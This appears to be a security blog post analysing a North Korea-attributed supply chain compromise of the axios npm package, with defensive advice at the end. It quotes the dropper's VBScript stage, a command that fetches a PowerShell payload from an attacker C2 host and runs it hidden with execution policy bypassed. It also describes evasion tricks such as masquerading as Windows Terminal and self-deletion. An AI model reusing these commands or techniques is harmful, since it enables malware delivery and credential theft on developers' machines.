Ever wonder why your next ‘npm install axios’ might summon a North Korean backdoor straight to your dev machine?
North Korea-nexus threat actor UNC1069 just pulled off a textbook supply chain attack on the axios npm package, the JavaScript HTTP library with over 100 million weekly downloads. On March 31, 2026, between 00:21 and 03:20 UTC, they slipped a malicious dependency, plain-crypto-js version 4.2.1, into axios releases 1.14.1 and 0.30.4. Google’s Threat Intelligence Group (GTIG) made the attribution on two legs: the second-stage payload is WAVESHAPER.V2, a backdoor already tied to this crew, and the infrastructure overlaps with their earlier operations.
This isn’t just any hack. It’s surgically precise, and it exploits the blind trust developers place in package maintainers. The attackers took over the axios maintainer account, switched its e-mail to an address they controlled, published the poisoned releases, and let a postinstall hook in package.json do the rest:
```json
"scripts": {
  "test": "echo \"Error: no test specified\" && exit 1",
  "postinstall": "node setup.js"
}
```
That snippet is pure stealth. npm runs postinstall automatically at the end of any install that isn’t passed --ignore-scripts, and nothing prompts the user. setup.js (SHA256: e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09) is an obfuscated dropper GTIG calls SILKBELL: it fingerprints the OS, XOR-decrypts its C2 URLs, and fetches a platform-specific second stage.
How UNC1069 Made Axios Their Trojan Horse
Look, supply chain hits aren’t new; SolarWinds still haunts us. What’s notable here is a North Korean crew taking its financially motivated playbook into open source distribution. UNC1069 has been active since 2018, and WAVESHAPER.V2 marks an upgrade: a cross-platform C++ backdoor that enumerates directories, collects system information and executes operator commands. Why now? A cash-strapped regime eyeing crypto heists, and a JS ecosystem that’s a sitting duck: low barriers to publish, enormous reach.
The dropper is clever. It pulls in fs, os and execSync (from child_process) through dynamic imports so a static scan for those identifiers comes up empty, deletes itself once it has run, and restores the original package.json from a copy it stashed as package.md so the installed tree looks clean afterwards. Forensic ninjutsu.
Windows path: it locates powershell.exe and copies it to %PROGRAMDATA%\wt.exe so the process masquerades as Windows Terminal, then uses curl to POST the body packages.npm.org/product1 to sfrclak[.]com:8000 and writes the response to a .ps1 in %TEMP%. The renamed PowerShell runs that script with a hidden window and -ep bypass (sidestepping execution policy), and the script file is deleted afterwards:
```vbscript
' VBScript stage as quoted in the write-up. Runs a hidden cmd.exe that fetches the
' PowerShell script, executes it through the renamed powershell.exe (wt.exe), then
' deletes it. The [.] in the domain is defanging, not part of the real URL.
Set objShell = CreateObject("WScript.Shell")
objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 & %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1 http://sfrclak[.]com:8000/6202033 & del ""PS_PATH"" /f", 0, False
```
macOS: a bash one-liner curls a Mach-O binary to /Library/Caches/com.apple.act.mond (POST body product0), chmods it executable and launches it in the background from zsh. Linux: a Python backdoor is written to /tmp/ld.py (POST body product2).
Cleanup is obsessive: temp files are removed and the dropper unlinks itself. But here’s my take, the one GTIG glosses over: this isn’t isolated DPRK opportunism. It’s a blueprint for state-sponsored supply chain cannibalism. Remember NotPetya? It started targeted and went pandemic. UNC1069’s financial angle (crypto theft, most likely) means they aren’t burning bridges; they’re farming them long-term. Bold prediction: by 2027 the top ten npm packages will be vetted like nuclear codes.
Why Did Axios Fall So Easily—and Could It Be You?
Maintainer compromise. Simple as that. An e-mail hijack, and the write-up doesn’t say whether 2FA was on (npm has required it for high-impact maintainers since 2022, but account recovery and publish tokens are still where accounts fall). Axios is ubiquitous in React apps and Node servers: your bank’s API calls, that SaaS dashboard, all potentially lit up.
But dig deeper: architectural rot in npm. Postinstall hooks are convenience turned weapon, as the ua-parser-js hijack showed back in 2021. Millions download blindly, and npm audit or yarn audit only match known advisories; neither looks at what a lifecycle script will execute. Dependency hell amplifies it: transitive pulls mean one bad apple poisons thousands of projects.
GTIG’s Mandiant crew details the IOCs, and I admire the thoroughness, but the PR spin undersells the why. npm hosts 2M+ packages, largely volunteer-maintained, with no universal signature check on install. North Korea bets on volume: hit a whale like axios and the collateral is your entire cloud.
Defenders, listen up. Audit installs: run npm ls axios and flag 1.14.1 or 0.30.4, and run npm ls plain-crypto-js (it should appear nowhere in your tree). Hunt for setup.js by its SHA256 with YARA, knowing a hash match is brittle and a recompiled dropper will slip past it. Block sfrclak[.]com on port 8000 at egress and check proxy logs for POST bodies of the form packages.npm.org/product0, product1 or product2. Treat any machine that ran the postinstall as compromised and rotate the credentials that lived on it. Going forward: commit package-lock.json and install with npm ci, set ignore-scripts=true in .npmrc and run npm rebuild explicitly for the few packages that genuinely need a build step, and prefer packages that publish Sigstore provenance attestations. Tools like Socket.dev or OSS Review Toolkit: deploy them now.
Is This the New Normal for Open Source Supply Chains?
Short answer: yes. And it’s terrifying.
We’ve shifted from perimeter defence to… what? Dependency diplomacy? The EU’s Cyber Resilience Act entered into force in late 2024, but its main obligations don’t apply until 2027: too late for this. The US executive order after SolarWinds? Toothless on foreign maintainers.
Unique angle: think of Stuxnet’s USB vector, a trusted carrier doing the delivery, except the carrier is now a package registry. DPRK isn’t just probing; it’s monetising flaws at scale. My critique of GTIG’s blog: a great technical deep-dive with zero on policy. Why is there no npm hall of shame for compromised packages? Shame works.
Dev shift needed. Disable install-time lifecycle scripts by default, enterprise-wide. Make signature-verified installs mandatory. Tools like Dependabot alerts need to step up from advisory matching to behavioural analysis of what a package actually does at install time.
This attack exposes JS’s fragility—client-side trust in a server-side world. Fix it, or watch nation-states turn your toolbox into theirs.
Frequently Asked Questions
What is the Axios NPM supply chain attack?
North Korea’s UNC1069 took over the axios maintainer account and published axios 1.14.1 and 0.30.4 with a malicious dependency, plain-crypto-js 4.2.1; a postinstall hook ran the SILKBELL dropper, which fetched platform-specific payloads including the WAVESHAPER.V2 backdoor.
How do I check if my project has the malicious Axios?
Run ‘npm ls axios’ and flag 1.14.1 or 0.30.4; also check the tree for plain-crypto-js and your egress logs for sfrclak[.]com traffic. Move to a clean release immediately, and if the postinstall ran, treat the machine as compromised and rotate the credentials that were on it.
Will North Korean hackers target more NPM packages?
Almost certainly. Financial motive plus easy access make the most-downloaded libraries prime targets. Vet dependencies rigorously and expect copycats.